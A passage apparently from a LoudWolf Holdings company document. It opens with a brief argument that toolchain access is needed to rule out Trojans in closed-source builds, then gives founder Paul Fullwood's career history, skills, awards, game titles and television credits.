Program, which gives it what Redmond describes as "controlled access" to Windows source code.
But the Windows source itself doesn't guarantee that versions of Windows will be free of Trojans.
Governments need access to the toolchain - to the compilers and linkers used to generate the code - as
that's where Trojans can be introduced. Without tools source, licensees are faced with the prospect
of tracing billions of possible execution paths, a near impossible task.
Until the closed source vendors open up the toolchain, and use that toolchain for verifiable builds,
this is one area where software libre will have a lasting advantage.
PAUL E. FULLWOOD - FOUNDER
Paul Fullwood is one of the founders of LoudWolf Holdings Ltd. He is currently President & COO of
Digital Animation Inc., a founding partner of Edison Research Labs and chairman of The First Fruits
Charities Inc. He is a board member of various other companies, including Digital Imagination Inc.
(sister company to Digital Animation).
Biography:
Born in England, Paul founded his first corporation in 1979, developing software for the then
emerging microcomputer industry. In 1984 he sold this business and emigrated to the United States,
where he created the world's first interactive game, dubbed Inter-Acter. Subsequently he founded
another company creating video game software for the fledgling gaming industry and providing
advanced hardware and software for the television and film industries. In 1991 Paul founded one of
the first Multi-Media studios in Los Angeles, California, where he pioneered the concept of video
games on CD. In 1996 Paul began work with a group of industry luminaries in the creation of the
Lightspan Partnership, where he created the software for the first ever complete K-12 computer
based curriculum, for kindergarten through graduation. In 1999 Paul moved to Boston to take on
the role of running the second largest group of Multi-Media studios in the world with Hasbro Inc. In
2000 Paul switched back to his entrepreneurial roots and moved to Silicon Valley, California to be a
part of the Silicon Valley Internet boom. There he was the visionary mind behind Paradigm3 and
Digital Animation Inc., creating innovative cutting-edge products that focused on fundamental new
technologies. In 2003 Paul relocated to Central California to build his latest business, focusing on
what Paul perceives to be the next big wave of technological innovation: creating computer
security systems for the 21st century.
2001-2004 Digital Animation Inc. – Founder – President & COO. Digital Animation Inc. is a private
venture capital funded company (1.1M Dollars) based in Silicon Valley, focusing on advanced
Internet compression technology for the transmission of animated entertainment and educational video
over the Internet. Responsibilities: concept development, day to day running of the company, raising
venture funding, developing technical and marketing strategies, budgeting. Technical focus: C++
video encoding tools and C++ client side decompression technology.
2000 – 2001 Paradigm3 Internet Software Inc. – Consultant – Acting COO. Paradigm3 is a venture
capital funded (Asia-tech Ventures) Internet software company focusing on Internet infrastructure
tools for metering and monitoring applications for Application Service Providers. Responsibilities:
day to day running of the company, raising venture funding, developing technical and marketing
strategies, budgeting. Technical focus: Java, Enterprise Java, Visual Café, Oracle 8 database.
1999 to 2000 Hasbro Interactive – Vice President, Head of Worldwide Studios. Hasbro is a
publicly traded 3.7 Billion-Dollar company based in Pawtucket, RI. Responsible for Hasbro
Interactive studios (formerly Microprose) worldwide, developing products under the Microprose,
Atari, Avalon Hill, Wizards of the Coast, and Hasbro brands. Responsible for managing studios
with an overall staff of 230 persons and budgets in the 26M range. Additionally responsible for the
3rd party software development for the Microprose and Atari brands, on Sony PlayStation, PC, Sega
Dreamcast and PS2.
1996 – 1998 The Lightspan Partnership Inc.: Vice President - Product Development.
Venture capital funded (120M), now a publicly traded company with a market cap of $100 Million
Dollars. VCs: Kleiner Perkins, Accel Partners, Microsoft, Tribune, TCI, Comcast, and Institutional
Venture Partners. Developing Sony PlayStation, PC and MAC Multi-Media titles for sale to public
schools nationwide. Responsible for strategic business & technical decisions company-wide,
product development and preparation for IPO. Reporting to the President with a staff of 75-120.
Budgets in the 6 to 9 M range; responsible for all outside business affairs relationships and all
outsource software development contracts (6 M Dollars in 1996).
1991 to 1996
Accent Media Productions Inc.: Founder - President - CEO.
Multi-Media, CD ROM, multi-platform development company founded in 1991, grossing
approximately 3M annually with 20 - 30 employees. Published titles: The Joker’s Wild!, Jeopardy!,
The Joker’s Wild Junior, Geo Safari, Varuna’s Forces. Platforms: Sony PlayStation, Sega Saturn,
Philips CD-I, Atari Jaguar, Windows PC & Macintosh. Overall creative and decision-making
responsibility. Including design, production and marketing.
1981 to 1991
Startech (US) Computer Consultancy Inc.: Founder - President - CEO.
Television production and technology company engaged in the development, presentation and sale
of numerous television shows. Also providing television creative and technical consultancy
services. Specializing in concept development, computer technology, graphics design, electronic
engineering and Multi-Media adaptations.
1979 to 1981
Startech Computer Consultancy Limited: Founder - Managing Director - CEO.
Software development company engaged in vertical market software development, entertainment
software development, and software publishing. Developed and published software in both the U.K.
and U.S. Platforms: Apple II, Macintosh, PC, Commodore 64, VIC 20, and Amiga.
PAUL FULLWOOD – KEY SKILLS
Expert in state-of-the-art security methodologies, focused on theoretical evaluation of
emerging threat vectors. Experienced in design and evaluation of hardware based security systems
for high value intellectual property.
Expert in producing multiple large software projects, including: creative concepts, rights
sourcing, software design, financing, venture capital sourcing, business affairs, interactive script
writing, sales, budgeting, scheduling, milestone creation, management of programming and art
teams, video production directing and editing. Very well "networked" in the security, television and
movie industries. Well connected in the Multi-Media industry and with other content providers.
In depth experience in the management of cutting edge technical development, including
definitions of concept, team building, product development and testing.
For the last seven years, in-depth executive experience managing a very large technical and
creative staff in large corporations. Strategic planning, business affairs, budgeting, schedules,
business accounting, tax strategies, cash management, business forecasting, creation of business
plans and marketing. Fully conversant with HR issues, investor relations, pre-IPO positioning, risk
factors, IPO publicity and road shows.
Over 25 years in the software business with experience as a start-up founder, game designer,
developer and programmer of entertainment and educational software.
Adept in business affairs, contracts of all types including software licensing, distribution
contracts, marketing agreements, strategic alliances, content licenses, talent contracts, marquee &
brand name licensing, core technology licenses, source code deals, localization issues etc.
Video production management. Multi-media out-source contract negotiation & creation,
intellectual property, licensing, reproduction, localization, derivatives and source code issues.
Managed the production of 3D real time polygon engines with texture mapping, for use as a
basis for multiple games. Experience in the creation of world editor tools for use in software
engines. Experience in developing Multi-Media titles for multiple platforms simultaneously,
utilizing state of the art cross platform development engines.
Developed cross platform development engines and tools (Sony PlayStation and PC).
Experience in managing companies involved in the production of high volume Multi-Media
products. Produced over 200 large budget CDs in two years, on both Sony PlayStation and PC.
Experience with video streaming and networking technology.
PAUL FULLWOOD - AWARDS
1995
Silver “Cindy” award, The Joker’s Wild!
“Emmy” nomination for “Masters of the Maze” Children’s television show.
1996
Parenting Magazine. Best children’s Multi-Media product of the year: The Joker’s Wild!
National Parenting Association, Best Multi-Media product: The Joker’s Wild! Junior.
The New York Festival World Medal Winner, Interactive Media category: Timeless Math 1, Maya Adventure Search
and Rescue.
1997
The 5th Annual Los Angeles International Animation Competition finalist, Best Animation Produced for Game
Platforms category: Timeless Math Adventure 4 Lunar Base.
The American Electronics Association Finalist, Software category.
Winner, The Jerry Crews Award The Greater San Diego Reading Association.
Telly award Silver, Education category: K9.5 – Live in Airedale.
Telly award winner, Education category: Timeless Math Adventure 4 Lunar Base.
New York Festival of Animation / Bronze Medal Winner, Math Enrichment category: Secret of Googol.
Telly award finalist, Sales Presentation category: Lightspan Animation Sampler.
1998
Global Information Infrastructure Awards (GII) finalist, Education category: The Lightspan Network.
Telly award finalist, Children’s audience category: Lightspan Challenge Timeless Math, Maya Adventure.
Silver “Cindy” award, Education K-12 category: K9.5 Live in Airedale.
Gold “Cindy” award, Education K-12 category: Timeless Math 4.
Gold “Cindy” award, Graphics, Animation, Visual Effects category: Secret of Googol, Googol Gulch.
Gold “Cindy” award, Education/Science & Math category: P.K’s Place Carlos at the Races.
Telly award finalist, Multimedia category: Timeless Math Lunar Base Adventure 4.
Telly award finalist, Multimedia category: P.K’s Place Hoopo at Sea.
Telly award winner Education category: Timeless Math, Lunar Base.
Telly award finalist, Children’s Audience category: Timeless Math, The Maya Adventure.
1999
Silver “Omni” award winner, Education category: Road Writer.
Bronze “Omni” award winner, Education category: Timeless Math Music Video.
Bronze “Omni” award winner, Education category: Timeless Math Space Flight Rescue.
Bronze Telly award winner, animation category: Road Writer.
Bronze Telly award winner, Animation category: Timeless Math Music Video.
Bronze Telly award winner, Animation category: Timeless Math Space Flight Rescue.
Professional organizations
Charter Member of the Academy of Digital Arts and Sciences
Member of the Computer Game Developers Association.
Member AMA
PAUL FULLWOOD – PUBLISHED TITLES
Title | Platform(s) | Participation
Meteor | VIC20, Commodore 64 | Programmer/Creator/Producer
Ski Run | VIC20, Commodore 64 | Programmer/Creator/Producer
Backgammon | Commodore 64 | Programmer/Creator/Producer
Painter | Commodore 64-128 | Programmer/Creator/Producer
Bunny | Commodore 64 | Programmer/Creator/Producer
Arcadia | VIC20 | Publisher
Cosmiads | VIC20 | Publisher
Vicman | VIC20 | Publisher
Vic Panic | VIC20 | Publisher
The Joker’s Wild! | CD-I | Producer/Creator/Developer
Jeopardy! | CD-I | Producer/Creator/Developer
The Joker’s Wild Junior | CD-I | Producer/Creator/Developer
Geo Safari | PC | Producer/Developer
Varuna’s Forces | PC, SEGA, SONY | Producer/Creator/Developer
Mars Moose series | PC, MAC, SONY | Senior Executive
Cosmic Quest (3 CDs) | PC, MAC, SONY | Senior Executive
Timeless Math series (7 CDs) | PC, MAC, SONY | Senior Executive
Timeless Math Jade Trade | PC, MAC, SONY | Senior Executive
Liquid Books series (6 CDs) | PC, MAC, SONY | Senior Executive
Googol series (8 CDs) | PC, MAC, SONY | Senior Executive
PK | PC, MAC, SONY | Senior Executive
Kazmania series (4 CDs) | PC, MAC, SONY | Senior Executive
Creative Voyage series | PC, MAC, SONY | Senior Executive
Math Tools | PC, MAC, SONY | Senior Executive
Road Writer | PC, MAC, SONY | Senior Executive
Quaddle series (3 CDs) | PC, MAC, SONY | Senior Executive
Walkabout series | PC, MAC, SONY | Senior Executive
Math On The Move | PC, MAC, SONY | Senior Executive
STRATES series (8 CDs) | PC, MAC, SONY | Senior Executive
Affiliate Titles (98 CDs) | PC, MAC, SONY | Senior Executive
Math Gallery (2 CDs) | PC, MAC, SONY | Senior Executive
Mech Warrior III | PC | Senior Executive
Star Trek Birth of Federation | PC | Senior Executive
The Next Tetris | PC, SONY | Senior Executive
The Company Guide | PC | Senior Executive
Worms Armageddon | PC, SONY | Senior Executive
Gunship III | PC | Senior Executive
PAUL FULLWOOD – TELEVISION & MOVIE CREDITS
Title | Production Entity | Detail
Win Lose or Draw | Kline & Friends Inc./Disney | NBC series 3 years. + Syndi 3 yrs.
Silver Spoons | Embassy Television | Network series 1 episode.
The Facts of Life | Embassy Television | Network series 1 episode.
Pictionary | Barry & Enright Productions | Syndicated series 13 weeks.
Hot Potato | Barry & Enright Productions | NBC Series 26 weeks, reruns.
The Jokers Wild! | Barry & Enright Productions | Syndicated 9 Years, reruns.
Chain Letters | Yorkshire Television | Network series.
Off The Wall | Alan Landsberg Productions | NBC network pilot.
Eavesdroppers | Martindale Gilden Productions | Syndicated pilot.
2nd Honeymoon | Martindale Gilden Productions | Syndicated series CBC 13 wks.
Top Secret | Martindale Gilden Productions | CBS pilot.
Strike It Rich | Kline & Friends Inc. | Syndicated series 39 weeks.
Break The Bank | Kline & Friends Inc. | Syndicated series 39 weeks.
Couch Potatoes | Saban Productions. | Group W cable 20 weeks.
Inter-Acter | Skip Alexander Productions | 8 years Syndication.
Bumper Stumpers | Barry & Enright Productions | 3 Years USA network.
Bumper Stumpers | Global Television Network | 3 years Canadian TV.
Talk About | D.L. Taffner Productions | Syndicated series 2 years.
In Other Words | D.L. Taffner Productions | CTV Canada 1 year.
Banko | Barry & Enright Productions | Fox television pilot.
The Joker’s Wild! | Kline & Friends Inc. | Syndicated pilot.
All About US | Barry & Enright Productions | Lexington Broadcasting 1 year.
Strike it Lucky | Thames Television England | Network series 4 years.
Divorce Wars | Orion Television | Syndicated pilot.
Una Nunca Saba | Inter telespan | Spanish series 26 weeks.
All About The Opposite sex | Barry & Enright Productions | Series 9 weeks.
Challengers | Buena Vista/Dick Clark | Syndicated series 52 weeks.
The Marsha Warfield Show | Kline & Friends Inc | NBC series 39 weeks.
Talk About (UK) | Yorkshire Television | ITV network series two years.
Talk About France | French Television | Network series 26 weeks.
Brains & Brawn | NBC Productions | NBC network series 39 weeks.
L’arch de Ore | French Television | Network series.
Critical Decisions | Harry Friedman productions | Pilot.
Split Second | Ralph Edwards Stu Billet Prod. | ABC pilot.
The Joker’s Wild! | Kline & Friends Inc | Syndicated series 36 weeks.
The Hank Gathers Story | Hallmark Hall of Fame Prod. | TV movie of the week.
Talk About | EIRE Irish Television | Network series.
Love & Sex Test | Hill Eubanks Productions | Playboy channel series 13 wks.
Labyrinth | D.L. Taffner | Lifetime television pilot.
Trashed! | MTV Networks | MTV pilot.
Caesars Challenge | Stephen J. Cannell Prod. | NBC network series 31 weeks.
Startest | Disney/ Buena Vista Prod. | Pilot.
NOVA | WGBH Boston | Public television special.
Quicksilver | Stone Stanley Productions | USA network series 13 weeks.
Free 4 All | Stone Stanley Productions | USA network series 13 weeks.
Masters of the Maze | Kline & Friends Productions | Family Channel 278 episodes.
Majority Rules | Dream Works | Television series.
Wheel of Fortune | Columbia Tristar/ Sony | Series re-design 1995 - present.
Outback Adventures | Becker Entertainment (AUS) | Series 1996 to present